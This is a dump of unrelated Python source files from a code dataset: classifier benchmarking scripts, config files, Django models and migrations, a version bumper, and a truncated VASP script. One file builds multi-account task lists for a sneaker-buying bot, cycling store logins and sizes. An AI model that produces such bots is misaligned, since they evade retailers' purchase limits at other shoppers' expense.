text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python
"""
* Get fortran code running for comparisons with R's party:cforest
** install cforest
** have script which runs forest and cforest on some dataset
** also run parf rf classifier on dataset
*** betsy: ~/scratch/rf_parf/parf
** compare results (will need to do crossvalidation)
** First try out on non-missing-value dataset
** Need some missing-feature datasets to try out
"""
import os, sys
import numpy
def example_initial_r_randomforest():
    """ Initial example which trains and classifies a R randomForest classifier
    Using 1 40/60 fold of debosscher data.
    """
    # Make the project's Algorithms/ package importable (TCP_DIR env var must be set).
    algorithms_dirpath = os.path.abspath(os.environ.get("TCP_DIR") + 'Algorithms/')
    sys.path.append(algorithms_dirpath)
    import rpy2_classifiers
    rc = rpy2_classifiers.Rpy2Classifier(algorithms_dirpath=algorithms_dirpath)
    # Full Debosscher training set in ARFF form.
    train_arff_str = open(os.path.expandvars("$HOME/scratch/full_deboss_1542srcs_20110106.arff")).read()
    traindata_dict = rc.parse_full_arff(arff_str=train_arff_str)
    Gen_Fold_Classif = rpy2_classifiers.GenerateFoldedClassifiers()
    # 10 random (non-stratified) folds; 40% of each fold held out for classification.
    all_fold_data = Gen_Fold_Classif.generate_fold_subset_data(full_data_dict=traindata_dict,
                                                               n_folds=10,
                                                               do_stratified=False,
                                                               classify_percent=40.)
    i_fold = 0 # of 10 folds
    fold_data = all_fold_data[i_fold]
    do_ignore_NA_features = False
    classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_0.rdata")# % (i_fold))
    # Train an R randomForest on the fold's training split and persist it as .rdata.
    Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
                                                              classifier_fpath=classifier_fpath,
                                                              do_ignore_NA_features=do_ignore_NA_features,
                                                              algorithms_dirpath=algorithms_dirpath)
    r_name='rf_clfr'
    classifier_dict = {'class_name':r_name}
    rc.load_classifier(r_name=r_name,
                       fpath=classifier_fpath)
    # Apply the loaded classifier to the held-out 40% split of the same fold.
    classif_results = rc.apply_randomforest(classifier_dict=classifier_dict,
                                            data_dict=fold_data['classif_data'],
                                            do_ignore_NA_features=do_ignore_NA_features)
    print "classif_results['error_rate']=", classif_results['error_rate']
    # Drop into the debugger so the results dict can be inspected interactively.
    import pdb; pdb.set_trace()
    print
def count_classes(class_list=None):
    """Tally the number of occurrences of each class name.

    Parameters
    ----------
    class_list : list of str, optional
        Class names, one entry per source.  Defaults to an empty list.

    Returns
    -------
    dict
        Mapping of class name -> occurrence count.
    """
    # The original signature used a mutable default (class_list=[]), which is
    # shared across calls; keep the keyword interface but default to None.
    if class_list is None:
        class_list = []
    count_dict = {}
    for class_name in class_list:
        # dict.get replaces the deprecated dict.has_key() check
        # (works on both Python 2 and 3).
        count_dict[class_name] = count_dict.get(class_name, 0) + 1
    return count_dict
def generate_parf_header_with_weighted_classes(count_dict=None,
                                               n_sources=0, arff_header=None):
    """ Given some class information and an existing arff header list,
    generate a parf style @attribute class entry.

    Class weights (inverse proportional to class frequency) are computed for a
    sanity check but intentionally NOT written into the header: per the
    original author's note, PARF applies its own internal weighting, and
    explicit weights worsened the final classification error.

    Parameters
    ----------
    count_dict : dict, optional
        Mapping class name -> occurrence count (see count_classes()).
    n_sources : int
        Total number of sources (normalizer for the per-class weights).
    arff_header : list of str, optional
        Existing ARFF header lines; only the '@attribute class' line is rewritten.

    Returns
    -------
    list of str
        New header lines, same length/order as arff_header.
    """
    # Fix: the original used mutable defaults ({} and []) shared across calls.
    if count_dict is None:
        count_dict = {}
    if arff_header is None:
        arff_header = []
    new_arff_header = []
    for line in arff_header:
        #if '@attribute source_id' in line.lower():
        # new_arff_header.append('@ignored source_id NUMERIC')
        # continue
        if not "@attribute class" in line.lower():
            new_arff_header.append(line)
            continue
        # Pull the quoted class names out of the {...} enumeration.
        sub_line = line[line.find('{')+1:line.rfind('}')]
        class_list = sub_line.split("','")
        new_line = line[:line.find('{')+1]
        total_weight = 0  # for sanity check only; should sum to ~1.0
        for quoted_class_name in class_list:
            class_name = quoted_class_name.strip("'")
            class_weight = count_dict[class_name] / float(n_sources)
            ### Using NO WEIGHT (weighted form would be: "'%s' (%f), "):
            new_line += "'%s', " % (class_name)
            total_weight += class_weight
        # Drop the trailing ", " and restore the closing brace / tail.
        new_line = new_line[:-2] + line[line.rfind('}'):]
        new_arff_header.append(new_line)
    return new_arff_header
if __name__ == '__main__':
    #example_initial_r_randomforest()
    # I want to do the following over the same folded datasets
    # I also want to use the same parms
    #####parf --verbose -t ~/scratch/full_deboss_1542srcs_20110106.arff -a ~/scratch/full_deboss_1542srcs_20110106.arff -n 1000 -m 25
    # NOTE: this is compiled differently (with different FFLAGS, CFLAGS) than for library/python wrapping version:
    parf_exec_fpath = '/home/pteluser/scratch/rf_parf__back_copy2/parf/parf'
    # Features which will have values randomly blanked out (to simulate
    # missing data) when use_missing_values is enabled below.
    noisify_attribs = [ \
        'freq1_harmonics_amplitude_0',
        'freq1_harmonics_amplitude_1',
        'freq1_harmonics_amplitude_2',
        'freq1_harmonics_amplitude_3',
        'freq1_harmonics_rel_phase_0',
        'freq1_harmonics_rel_phase_1',
        'freq1_harmonics_rel_phase_2',
        'freq1_harmonics_rel_phase_3',
        'freq2_harmonics_amplitude_0',
        'freq2_harmonics_amplitude_1',
        'freq2_harmonics_amplitude_2',
        'freq2_harmonics_amplitude_3',
        'freq2_harmonics_rel_phase_0',
        'freq2_harmonics_rel_phase_1',
        'freq2_harmonics_rel_phase_2',
        'freq2_harmonics_rel_phase_3',
        'freq3_harmonics_amplitude_0',
        'freq3_harmonics_amplitude_1',
        'freq3_harmonics_amplitude_2',
        'freq3_harmonics_amplitude_3',
        'freq3_harmonics_freq_0',
        'freq3_harmonics_rel_phase_0',
        'freq3_harmonics_rel_phase_1',
        'freq3_harmonics_rel_phase_2',
        'freq3_harmonics_rel_phase_3',
        'freq_amplitude_ratio_31',
        'freq_frequency_ratio_31',
        'freq_signif_ratio_31',
        'skew',
        'qso_log_chi2_qsonu',
        'qso_log_chi2nuNULL_chi2nu',
        'median_absolute_deviation',
        'std',
        'stetson_j',
        'percent_difference_flux_percentile']
    # Shared classifier parameters (kept identical across parf / randomForest / cforest).
    ntrees = 100
    mtry=25
    nodesize=5
    use_missing_values = True
    prob_source_has_missing=0.3
    prob_misattrib_is_missing=0.5
    algorithms_dirpath = os.path.abspath(os.environ.get("TCP_DIR") + 'Algorithms/')
    sys.path.append(algorithms_dirpath)
    import rpy2_classifiers
    rc = rpy2_classifiers.Rpy2Classifier(algorithms_dirpath=algorithms_dirpath)
    train_arff_str = open(os.path.expandvars("$HOME/scratch/full_deboss_1542srcs_20110106.arff")).read()
    if use_missing_values:
        # Randomly blank out feature values to emulate missing-value datasets.
        train_arff_str = rc.insert_missing_value_features(arff_str=train_arff_str,
                                                          noisify_attribs=noisify_attribs,
                                                          prob_source_has_missing=prob_source_has_missing,
                                                          prob_misattrib_is_missing=prob_misattrib_is_missing)
    traindata_dict = rc.parse_full_arff(arff_str=train_arff_str, fill_arff_rows=True)
    arff_header = rc.parse_arff_header(arff_str=train_arff_str)#, ignore_attribs=['source_id'])
    Gen_Fold_Classif = rpy2_classifiers.GenerateFoldedClassifiers()
    all_fold_data = Gen_Fold_Classif.generate_fold_subset_data(full_data_dict=traindata_dict,
                                                               n_folds=10,
                                                               do_stratified=False,
                                                               classify_percent=40.)
    temp_arff_fpath_root = os.path.expandvars("/tmp/parf")
    # Accumulators of per-fold error rates over every (repeat, fold) combination.
    meta_parf_avgs = []
    meta_R_randomForest_avgs = []
    meta_R_cforest_avgs = []
    # Repeat the whole 10-fold comparison 50 times to tighten the averages.
    for k in range(50):
        parf_fpath_dict = {}
        results_dict = {}
        for i_fold, fold_dict in all_fold_data.iteritems():
            parf_fpath_dict[i_fold] = {}
            results_dict[i_fold] = {}
            # Write one temp ARFF file per data_case ('train_data' / 'classif_data').
            for data_case in fold_dict.keys():
                if data_case == 'train_data':
                    count_dict = count_classes(class_list=fold_dict['train_data']['class_list'])
                    n_sources = len(fold_dict['train_data']['class_list'])
                    new_arff_header = generate_parf_header_with_weighted_classes(count_dict=count_dict, n_sources=n_sources, arff_header=arff_header)
                else:
                    new_arff_header = arff_header
                fold_arff_lines = []
                fold_arff_lines.extend(new_arff_header)
                fold_arff_lines.extend(fold_dict[data_case]['arff_rows'])
                fold_arff_fpath = "%s_%s_%d" % (temp_arff_fpath_root, data_case, i_fold)
                if os.path.exists(fold_arff_fpath):
                    os.system('rm ' + fold_arff_fpath)
                fp = open(fold_arff_fpath, 'w')
                for line in fold_arff_lines:
                    fp.write(line + '\n')
                fp.close()
                parf_fpath_dict[i_fold][data_case] = fold_arff_fpath
            ### Do parf classification
            exec_parf_str = '%s -t %s -a %s -n %d -m %d -xs %d -ri source_id -uu source_id' % ( \
                parf_exec_fpath,
                parf_fpath_dict[i_fold]['train_data'],
                parf_fpath_dict[i_fold]['classif_data'],
                ntrees, mtry, nodesize)
            print exec_parf_str
            # Run parf and capture its stdout; stdin (a) and stderr (c) are unused.
            (a,b,c) = os.popen3(exec_parf_str)
            a.close()
            c.close()
            lines_str = b.read()
            b.close()
            lines = lines_str.split('\n')
            # Scrape error rate and kappa from parf's summary output line.
            for line in lines:
                if not 'Testset classification error' in line:
                    continue
                vals = line.split()
                class_error = float(vals[4].strip('%'))
                kappa = float(vals[8])
                results_dict[i_fold]['parf'] = {'class_error':class_error,
                                                'kappa':kappa}
        if not use_missing_values:
            ### Do the R randomForest here:
            # (skipped for missing-value runs)
            do_ignore_NA_features = False
            for i_fold, fold_data in all_fold_data.iteritems():
                classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_%d.rdata" % (i_fold))
                Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
                                                                          classifier_fpath=classifier_fpath,
                                                                          do_ignore_NA_features=do_ignore_NA_features,
                                                                          algorithms_dirpath=algorithms_dirpath,
                                                                          ntrees=ntrees, mtry=mtry,
                                                                          nfolds=10, nodesize=nodesize)
                r_name='rf_clfr'
                classifier_dict = {'class_name':r_name}
                rc.load_classifier(r_name=r_name,
                                   fpath=classifier_fpath)
                classif_results = rc.apply_randomforest(classifier_dict=classifier_dict,
                                                        data_dict=fold_data['classif_data'],
                                                        do_ignore_NA_features=do_ignore_NA_features)
                print "classif_results['error_rate']=", classif_results['error_rate']
                results_dict[i_fold]['randomForest'] = {'class_error':classif_results['error_rate']}
        # # # # # #
        # # # # # #
        # # # # # #
        ### Do the R cforest here:
        do_ignore_NA_features = False
        for i_fold, fold_data in all_fold_data.iteritems():
            classifier_fpath = os.path.expandvars("$HOME/scratch/classifier_RF_%d.rdata" % (i_fold))
            print 'generating cforest...'
            Gen_Fold_Classif.generate_R_randomforest_classifier_rdata(train_data=fold_data['train_data'],
                                                                      classifier_fpath=classifier_fpath,
                                                                      do_ignore_NA_features=do_ignore_NA_features,
                                                                      algorithms_dirpath=algorithms_dirpath,
                                                                      ntrees=ntrees, mtry=mtry,
                                                                      nfolds=10, nodesize=nodesize,
                                                                      classifier_type='cforest')
            r_name='rf_clfr'
            classifier_dict = {'class_name':r_name}
            rc.load_classifier(r_name=r_name,
                               fpath=classifier_fpath)
            print 'applying cforest...'
            classif_results_cforest = rc.apply_cforest(classifier_dict=classifier_dict,
                                                       data_dict=fold_data['classif_data'],
                                                       do_ignore_NA_features=do_ignore_NA_features)
            print "classif_results['error_rate']=", classif_results_cforest['error_rate']
            results_dict[i_fold]['cforest'] = {'class_error':classif_results_cforest['error_rate']}
        ##### Analyze the results (compare the classifiers):
        parf_errors = []
        randomForest_errors = []
        cforest_errors = []
        for i_fold in all_fold_data.keys():
            # parf reports percent; normalize to a fraction.  randomForest may
            # be absent for missing-value runs, hence the -1 sentinel.
            parf_errors.append(results_dict[i_fold]['parf']['class_error'] / 100.)
            randomForest_errors.append(results_dict[i_fold].get('randomForest',{}).get('class_error',-1))
            cforest_errors.append(results_dict[i_fold]['cforest']['class_error'])
        #meta_parf_avgs.append(numpy.mean(parf_errors))
        #meta_R_randomForest_avgs.append(numpy.mean(randomForest_errors))
        #meta_R_cforest_avgs.append(numpy.mean(cforest_errors))
        meta_parf_avgs.extend(parf_errors)
        meta_R_randomForest_avgs.extend(randomForest_errors)
        meta_R_cforest_avgs.extend(cforest_errors)
        print "PARF mean=%lf, std=%lf" % (numpy.mean(parf_errors), numpy.std(parf_errors))
        print "randomForest mean=%lf, std=%lf" % (numpy.mean(randomForest_errors), numpy.std(randomForest_errors))
        print "cforest mean=%lf, std=%lf" % (numpy.mean(cforest_errors), numpy.std(cforest_errors))
        #### Put this within the inner loop so can see how this is improving:
        print 'META PARF :', numpy.mean(meta_parf_avgs), numpy.std(meta_parf_avgs), k*10 + i_fold
        print 'META randomForest:', numpy.mean(meta_R_randomForest_avgs), numpy.std(meta_R_randomForest_avgs), k*10 + i_fold
        print 'META cforest :', numpy.mean(meta_R_cforest_avgs), numpy.std(meta_R_cforest_avgs), k*10 + i_fold
    print 'Final META PARF :', numpy.mean(meta_parf_avgs), numpy.std(meta_parf_avgs)
    print 'Final META randomForest:', numpy.mean(meta_R_randomForest_avgs), numpy.std(meta_R_randomForest_avgs)
    print 'Final META cforest :', numpy.mean(meta_R_cforest_avgs), numpy.std(meta_R_cforest_avgs)
    # Hold the process open for interactive inspection of the final numbers.
    import pdb; pdb.set_trace()
    print
|
#config.py
# Config file for PyGlass Client
from configobj import ConfigObj
#This imported by PyGlass via import config
#
#CONSTANTS
# Data-source mode identifiers (mirrored in `modes` / `modes_list` below).
TEST = 1 #run test routine (will not receive any data from Flight Sim program)
FSXSP0 = 2 #Receive data from test routine
FSXSP1 = 3
FSXSP2 = 4
ESP = 5
CLIENT = 6
# Name -> mode-id lookup; note CLIENT (6) is intentionally absent here.
modes = {'Test':1,'FSXSP0':2,'FSXSP1':3,'FSXSP2':4,'ESP':5}
modes_list = ['Test','FSXSP0','FSXSP1','FSXSP2','ESP']
class general_c(object):
    """Loads the client configuration from an INI-style file via ConfigObj."""
    def __init__(self, filename):
        # Raw ConfigObj mapping; typed accessors below are currently disabled.
        self.config = ConfigObj(filename)
        # self.glassserver_port = int(self.config['GlassServer']['port'])
        # self.webserver_port = int(self.config['WebServer']['port'])
# Module-level singleton, read by PyGlass via `import config`.
client = general_c('config.cfg')
"""
BasicWriter Class
"""
from logging import Logger
import os
from ..common import get_default_logger, WriteFileAlreadyExists
from ..format.ynf import cYnf
class BasicWriter(object):
    """
    BasicWriter class.

    Base class for converting the Ynf format into some other format.
    """
    def __init__(self, file_path:str, overwrite:bool=False, logger:Logger=None):
        """
        Constructor.

        Parameters
        ----------
        file_path: str
            Output file path.
        overwrite: bool
            Overwrite the file if it already exists.
        logger: Logger
            Logger; falls back to the package default logger when omitted.
        """
        # Set up the logger
        self.logger = logger or get_default_logger()
        # Start-of-run log lines
        msg = f'Start writing. ({self.__class__.__name__})'
        self.logger.info(msg)
        self.logger.info(f'file:{file_path}')
        # When the target already exists, the overwrite option is mandatory
        if os.path.exists(file_path):
            if not overwrite:
                raise WriteFileAlreadyExists(
                    'Write file is already exists. ' + \
                    'Consider using a option `overwrite=True`.'
                )
            # An existing directory at the target path is always an error
            if os.path.isdir(file_path):
                raise WriteFileAlreadyExists(
                    f'Directory is exists. ({file_path})'
                )
            # overwrite was requested, so delete the existing file here
            os.remove(file_path)
        # Remember the output path for write()
        self.file_path = file_path
    def write(self, ynf: cYnf):
        """
        Write the file specified in the constructor.

        Derived classes must override this method.

        Parameters
        ----------
        ynf: cYnf
            The cYnf instance to write out.
        """
        raise NotImplementedError
    def write_from_ynf_file(self, file_path: str):
        """
        Write the output file starting from a serialized Ynf file.

        Parameters
        ----------
        file_path: str
            File containing a serialized cYnf.
        """
        # Deserialize the Ynf file
        ynf = cYnf.deserialize(file_path)
        # Delegate to the (overridden) writer
        self.write(ynf)
|
#!/bin/python3
"""
bumper
======
Version bumping interface.
Allows bumping by specified version and SemVer semantics.
"""
from abc import ABCMeta, abstractmethod
from garden.log import logger
import argparse
import enum
import re
_logger = logger
#: Regex for matching version numbers
RE_VERSION = '(?P<version>(?:\d+\.?){3})'
_version_help = ('Either a Semantic Version alias (patch, minor, major), or a'
' specified version, like x.y.z')
class SemVer(enum.Enum):
    """Semantic-version bump levels; the values double as CLI aliases."""
    patch = 'patch'
    minor = 'minor'
    major = 'major'
def snr(line_gen, pattern, version):
    """Search & replace a pattern from a stream of strings.

    The first capture group will be replaced with the given version.

    :arg line_gen: iterable/generator of lines to process.
    :arg pattern: regex source with one capture group (compiled with MULTILINE).
    :arg str version: replacement text for the captured group.
    :returns: generator yielding each line with the replacement applied.
    """
    p = re.compile(pattern, re.MULTILINE)
    # Iterate the stream directly.  The original used
    # `next(line_gen, False)` in a while loop, which silently stopped at the
    # first *falsy* line (e.g. an empty string), truncating the stream.
    for line in line_gen:
        yield eager_replace(p, version, line)
def eager_replace(pattern, repl, line):
    """Replace the text captured by the first group of *pattern* in *line*.

    Returns *line* unchanged when the pattern does not match at the start of
    the line or captures no groups.
    """
    m = re.match(pattern, line)
    if m and m.groups():
        # Splice *repl* over the span of capture group 1.  The original called
        # `re.sub(m.groups[1], repl, line)`, which raises TypeError on every
        # match (`groups` is a method, not a sequence) and would have indexed
        # the wrong group anyway.
        line = line[:m.start(1)] + repl + line[m.end(1):]
    return line
class Bumper(metaclass=ABCMeta):
    """Abstract interface for version-bumping targets within a code base."""
    @abstractmethod
    def bump(self, target, version=SemVer.patch, **kwargs):
        """Increments the target version with the code base.
        It is up to the implementation to define valid targets.
        :arg str target: Name of target within code.
        :kwarg `SemVer` semver: Semantic version level to version bump by.
        """
        return
    @property
    @abstractmethod
    def targets(self):
        """Returns a list of targets available for bumping."""
        return
    @classmethod
    def __subclasshook__(cls, C):
        # If comparing *against* Bumper
        if cls is Bumper:
            # Structural check: any class with a 'bump' attribute anywhere in
            # its MRO is accepted as a virtual subclass (duck typing).
            if any("bump" in B.__dict__ for B in C.__mro__):
                return True
        return NotImplemented
def bump_version(version, new_version=SemVer.patch):
    """Changes the version by the given semantic versioning new_version, or specific
    version.

    :arg str version: Current 'x.y.z' version string.
    :arg new_version: Either a `SemVer` member or an explicit 'x.y.z' string.
    :returns: The new 'x.y.z' version string (or *version* unchanged when
        *new_version* is unrecognized).
    """
    # An explicit 'x.y.z' string wins outright.  The original tested *version*
    # against RE_VERSION here, so any well-formed current version returned
    # immediately and the SemVer branches below were unreachable.
    if isinstance(new_version, str) and re.match(RE_VERSION, new_version):
        return new_version
    # Original bug: split_version() was called without its required argument.
    x = split_version(version)
    if new_version == SemVer.patch:
        x[2] += 1
    elif new_version == SemVer.minor:
        # Minor bump resets the patch component.
        x[2] = 0
        x[1] += 1
    elif new_version == SemVer.major:
        # Major bump resets minor and patch.
        x[1], x[2] = 0, 0
        x[0] += 1
    else:
        _logger.warning('No semver match')
        return version
    return '.'.join(map(str, x))
def to_version(arg):
    """Converts 'arg' to a SemVer value or validates an 'x.y.z' string.

    Intended for use as an argparse ``type=`` callable.

    :raises argparse.ArgumentTypeError: when *arg* is neither a SemVer alias
        nor a well-formed version string.
    """
    try:
        return SemVer(arg)
    except ValueError:
        if re.match(RE_VERSION, arg):
            return arg
        else:
            # ArgumentTypeError is what argparse expects from a type= callable.
            # The original raised ArgumentError(_version_help), but
            # ArgumentError requires (argument, message) and itself raises
            # TypeError when constructed with a single argument.
            raise argparse.ArgumentTypeError(_version_help)
def split_version(version):
    """Split an 'x.y.z' version string into a list of ints [x, y, z]."""
    return [int(part) for part in version.split('.')]
def setup_parser(argparser, repos):
    """Attach arguments to the given argparser."""
    def do_bump(args):
        # Closure dispatched via argparser.set_defaults(func=do_bump).
        _logger.debug('Calling bump on %s', args.repo)
        try:
            # Load the entrypoint code
            repos['bump'][args.repo].load()
            # Call registered 'bump' method on target repo
            # NOTE(review): this lookup differs from the load above
            # (repos[args.repo] vs repos['bump'][args.repo]) -- confirm which
            # indexing is intended; a mismatch is swallowed by the KeyError
            # handler below.
            repos[args.repo](args.target, args.version, *args.args)
        except KeyError:
            _logger.warning("No repo called '%s' found", args.repo)
    argparser.add_argument('repo')
    argparser.add_argument('target', type=str)
    # to_version validates/converts the positional version argument.
    argparser.add_argument('version', type=to_version, help=_version_help)
    argparser.add_argument('args', nargs=argparse.REMAINDER,
                           help='Addtional arguments to pass through')
    argparser.set_defaults(func=do_bump)
    _logger.debug('Setup bump() parsing')
|
import math

# 6**1000 has 779 decimal digits -- far beyond the double-precision range
# (~1.8e308), so math.pow(6, 1000) raises OverflowError.  Python's integer
# exponentiation operator computes the exact arbitrary-precision result.
print(6 ** 1000)
import json
# NOTE: `global` at module scope is a no-op; kept for byte-compatibility.
# Billing/shipping profile names, one per line in profiles.txt
# (trailing newline stripped with [:-1]).
global profile_list
profile_list = []
with open("profiles.txt","r") as file:
    for profile in file:
        profile_list.append(profile[:-1])
# Store logins, one "username:password" pair per line.
global logins_undftd
logins_undftd = []
with open("logins_undftd.txt","r") as file:
    for line in file:
        login = {}
        login.update({"username":line.split(":")[0]})
        login.update({"password":line.split(":")[1][:-1]})
        logins_undftd.append(login.copy())
# Shoe sizes, one per line.
global size_list
size_list = []
with open("sizes.txt","r") as file:
    for line in file:
        size_list.append(line[:-1])
def listCycle(list0):
    """Rotate *list0* left by one position (in place) and return the element
    that was moved from the front to the back.

    Raises IndexError on an empty list, matching the original behavior.
    """
    head = list0.pop(0)
    list0.append(head)
    return head
# Prompt for one or more target site names (comma-separated).
site = raw_input('''
################################### ~ CHOOSE A SITE BY ENTERING SITE NAME EXACTLY AS SHOWN BELOWN ~ #################################################
12amrun 18montrose A-Ma-Maniere APBStore AddictMiami AntiSocialSocialClub Attic
BBCIceCream BBCIceCreamEU Bape* Beatniconline BlackMarketUS Blends Bodega
BowsAndArrows BurnRubber Commonwealth Concepts CrtsdSnkrs DSM-EU DSM-JP
DSM-SG DSM-US DreamTown* EllenShop Exclucity ExtraButter FearOfGod
Feature FiceGallery FunkoShop* GoodAsGold GraffitiPrints HanonShop Haven
HighsAndLows HistoryOfNY Hotoveli JustDon JustinTimberlake Kith KylieCosmetics
LaceUpNYC LapstoneAndHammer LessOneSeven Livestock Machus MarathonSports MiniShopMadrid
NRML Noirfonce Nomad* Notre ObeyGiant OctobersVeryOwnCA* OctobersVeryOwnUK
OctobersVeryOwnUS* OffTheHook Oipolloi Omocat Oneness287 PackerShoes PalaceUS
Par5MilanoYeezy Places+Faces ProperLBC RSVPGallery ReigningChamp Renarts RimeNYC
Rise45 RockCityKicks RoninDivision RonnieFieg SaintAlfred ShoeGalleryMiami ShopNiceKicks
SneakerPolitics SneakerWorldShop SocialStatusPHG Solefly Soleheaven Stampd StaplePigeon
StoneIsland Suede TheClosetInc TheDarkSideInitiative TravisScott* TrophyRoom Undefeated
Unknwn Vlone WishATL WorldOfHombre Xhibition YeezySupply
######################################################################################################################################################
################################## You may enter more than one site like this Kith, HanonShop, Undefeated ############################################
######################################################################################################################################################
>> ''')
site_list = []
if "," in site:
    site_list = site.split(",")
global sites
sites = []
# Repeat each chosen site once per size, so sites and sizes cycle in step.
for site in site_list:
    for i in range(0,len(size_list)):
        sites.append(site)
maxtasks = raw_input("How many tasks? >>")
maxtasks = int(maxtasks)
captcha = raw_input('''
1 - No captcha
2 - Captcha
''')
if captcha == "1":
    hasCaptcha = False
else:
    hasCaptcha = True
keywords = raw_input('''
Please type in your keywords (i.e. +jordan,+off,+white,+1)
''')
# NOTE(review): after the loop above, `site` holds the *last* list entry (or
# the raw input when no comma was entered) -- confirm this is intended.
if site == "Undefeated":
    useAccount = True
else:
    useAccount = False
tasks = []
count = 0
# Build one task dict per requested slot, cycling logins/profiles/sizes/sites.
for i in range(0,maxtasks):
    task = {}
    task.update({"atcQuantity":""})
    task.update({"checkoutMode":"old"})
    task.update({"hasCaptcha":hasCaptcha})
    task.update({"id":count})
    task.update({"monitorInput":keywords})
    task.update({"monitorType":"keywords"})
    task.update({"newProductsOnly":False})
    task.update({"password":listCycle(logins_undftd)["password"]})
    task.update({"profile":listCycle(profile_list)})
    task.update({"scheduleTask":False})
    task.update({"scheduleTime":""})
    if len(site_list) > 1:
        task.update({"site":listCycle(sites)})
    else:
        task.update({"site":site})
    task.update({"size":listCycle(size_list)})
    # NOTE(review): this loop leaves useAccount reflecting only the *last*
    # element of `sites`, not the site assigned to this task -- verify.
    for site in sites:
        if "Undefeated" in site:
            useAccount = True
            continue
        else:
            useAccount = False
    task.update({"useAccount":useAccount})
    task.update({"username":listCycle(logins_undftd)["username"]})
    tasks.append(task.copy())
    count = count + 1
# Persist the generated task list for the bot to consume.
with open("Generated Tasks.json","w") as file:
    json.dump(tasks,file)
|
from django.db import models
class Transactions(models.Model):
    """Ledger entry recording a transfer of *amount* between two users."""

    # Fix: every field line originally ended with a trailing comma, which
    # wrapped each field in a 1-tuple and hid it from Django's model
    # metaclass (no columns would have been created).
    amount = models.BigIntegerField()
    user_ID_from = models.PositiveIntegerField()
    user_ID_to = models.PositiveIntegerField()
    # Fix: models.parse_datetime() does not exist; the timestamp column is a
    # DateTimeField.
    date = models.DateTimeField()
    #TODO @classmethod
    #TODO def create_transaction(cls, amount,user_ID_from, user_ID_to,date):
|
import time

import numpy as np
import pandas as pd
# Fix: `from sklearn.cross_validation import train_test_split` was removed in
# sklearn 0.20 and was immediately shadowed by the model_selection import
# below anyway; the duplicated pandas/numpy imports are also collapsed.
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from gcforest.gcforest import GCForest

# Kaggle MNIST training csv: column 0 is the digit label, columns 1..784 the
# 28x28 pixel values.
data = pd.read_csv('/Users/YanYu/Downloads/all/train.csv')
ddata = np.array(data)
x = ddata[:1000, 1:785].copy()  # first 1000 rows keep this demo fast
y = ddata[:1000, :1].copy()
y = y.flatten()
X_train, X_test, y_train, y_test = train_test_split(x, y, test_size=0.25,
                                                    random_state=9)
gcf = GCForest(shape_1X=[28, 28], window=[14, 16], tolerance=0.0,
               min_samples_mgs=10, min_samples_cascade=7)
gcf.fit(X_train, y_train)
# Fix: predict() was called with the csv path string
# 'Users/YanYu/Downloads/all/test.csv'; it must receive the held-out feature
# matrix so the predictions align with y_test in the accuracy computation.
pred_X = gcf.predict(X_test)
accuracy = accuracy_score(y_true=y_test, y_pred=pred_X)
print('gcForest accuracy:{}'.format(accuracy))
|
# Generated by Django 3.0.3 on 2020-03-16 18:43
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates ClienteModel (customer
    # contact data) and DimensaoModel (pool dimensions / quote data).
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='ClienteModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nome', models.CharField(max_length=30)),
                ('sobrenome', models.CharField(max_length=30)),
                ('cidade', models.CharField(blank=True, max_length=20)),
                ('estado', models.CharField(blank=True, max_length=15)),
                ('rua', models.CharField(blank=True, max_length=100)),
                ('numero_casa', models.CharField(blank=True, max_length=6)),
                ('cep', models.CharField(blank=True, max_length=20)),
                ('telefone', models.CharField(blank=True, max_length=15)),
                ('email', models.EmailField(blank=True, help_text='Ex. clinte@gmail.com', max_length=50)),
            ],
            options={
                'ordering': ['nome', 'sobrenome'],
            },
        ),
        migrations.CreateModel(
            name='DimensaoModel',
            # NOTE(review): max_length is ignored by FloatField -- the model
            # probably intended max_digits/decimal_places on a DecimalField;
            # confirm against the source models.py before regenerating.
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('comprimento', models.FloatField(help_text='Ex. 8.00', max_length=3)),
                ('largura', models.FloatField(help_text='Ex. 4.00', max_length=3)),
                ('prof_inicial', models.FloatField(help_text='Ex. 1.20', max_length=3)),
                ('prof_final', models.FloatField(help_text='Ex. 1.40', max_length=3)),
                ('largura_calcada', models.FloatField(blank=True, default=1, help_text='Ex. 1.00', max_length=3)),
                ('espessura', models.CharField(choices=[['0.6', '0.6 mm'], ['0.7', '0.7 mm'], ['0.8', '0.8 mm']], help_text='Espessura do vinil', max_length=3)),
                ('fornecedor', models.CharField(choices=[['sodramar', 'Sodramar'], ['viniplas', 'Viniplas']], help_text='Fornecedor do vinil', max_length=8)),
                ('profundidade_media', models.FloatField(max_length=5)),
                ('area_calcada', models.FloatField(max_length=5)),
                ('perimetro', models.FloatField(max_length=5)),
                ('m2_facial', models.FloatField(max_length=5)),
                ('m2_parede', models.FloatField(max_length=5)),
                ('m2_total', models.FloatField(max_length=5)),
                ('m3_total', models.FloatField(max_length=5)),
                ('m3_real', models.FloatField(max_length=5)),
                ('filtro', models.CharField(max_length=30)),
                ('motobomba', models.CharField(max_length=30)),
                ('tampa_casa_maquinas', models.CharField(max_length=30)),
                ('sacos_areia', models.CharField(max_length=30)),
                ('vinil_m2', models.FloatField(max_length=5)),
                ('isomanta_m2', models.FloatField(max_length=5)),
                ('perfil_fixo_m', models.FloatField(max_length=5)),
                ('escavacao', models.CharField(max_length=30)),
                ('construcao', models.CharField(max_length=30)),
                ('contra_piso', models.CharField(max_length=30)),
                ('remocao_terra', models.CharField(max_length=30)),
                ('instalacao_vinil', models.CharField(max_length=30)),
                ('data', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(blank=True, choices=[('Em negociação', 'Em negociação'), ('Contrato', 'Contrato'), ('Encerrado', 'Encerrado')], default='Em negociação', help_text='Status do Orçamento', max_length=15)),
            ],
        ),
    ]
|
import os
from ase.io import vasp
from ase.io import lammpsdata
import configparser
import sys
# Module-level defaults, overridden by readVASP() from the [VASP] config section.
binVasp = 'vasp_std'   # VASP executable name passed to the MPI launcher
